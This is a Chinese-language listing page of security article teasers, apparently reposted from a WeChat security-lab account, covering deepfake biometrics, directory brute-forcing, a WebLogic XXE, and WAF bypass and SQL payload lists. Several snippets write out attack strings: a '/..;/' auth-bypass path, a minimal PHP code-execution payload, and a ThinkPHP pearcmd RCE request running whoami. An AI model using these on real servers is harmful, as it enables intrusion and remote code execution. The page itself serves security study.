根据Gartner公司的预测,到2026年,30%的企业将因为人工智能(AI)生成的人脸生物识别深度伪造攻击而认为此类身份认证和验证解决方案不再能够起到可靠的作用。Gartner研究副总裁Akif K...
Tips 身份验证绕过
/..;/原文始发于微信公众号(Khan安全攻防实验室):Tips 身份验证绕过
模糊测试之DirBuster
一、DirBuster简介 DirBuster是一个多线程的基于Java的应用程序设计用于暴力破解Web ...
WebLogic未授权XXE漏洞(CVE-2019-2888)
大家好,今天给大家带来的是weblogic的XXE漏洞复现,虽然这个漏洞爆出已有一段时间了,但我在工作中经常遇到weblogic这个中间件的,这几天复现了一下这个XXE漏洞,特此记录一下。...
PHP 代码执行最短 Payload
15 个字节:<?='$_GET[1]'?>原文始发于微信公众号(Khan安全攻防实验室):PHP 代码执行最短 Payload
WAF Bypass Payloads
原文始发于微信公众号(Khan安全攻防实验室):WAF Bypass Payloads
史上最全子域名字典
在线子域名工具: https://weakpass.com/generate/domains 字典: https://download.weakpass.com/probable/2023/02/s...
bypass WAF
原文始发于微信公众号(Khan安全攻防实验室):bypass WAF
Top 10 Exploited in 2022
原文始发于微信公众号(Khan安全攻防实验室):Top 10 Exploited in 2022
thinkphp RCE
/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami/index.ph...
特斯拉-低功耗蓝牙( BLE ) 中继攻击
首席安全顾问兼研究员 Sultan Qasim Khan 表示:“从数百英里外侵入一辆汽车,清楚地表明我们的互联世界如何让我们面临来自国家另一端——有时甚至是世界另一端的威胁”在安全公司 NCC Gr...
Blind (Time Based ) SQL payloads list
原文始发于微信公众号(Khan安全攻防实验室):Blind (Time Based ) SQL payloads list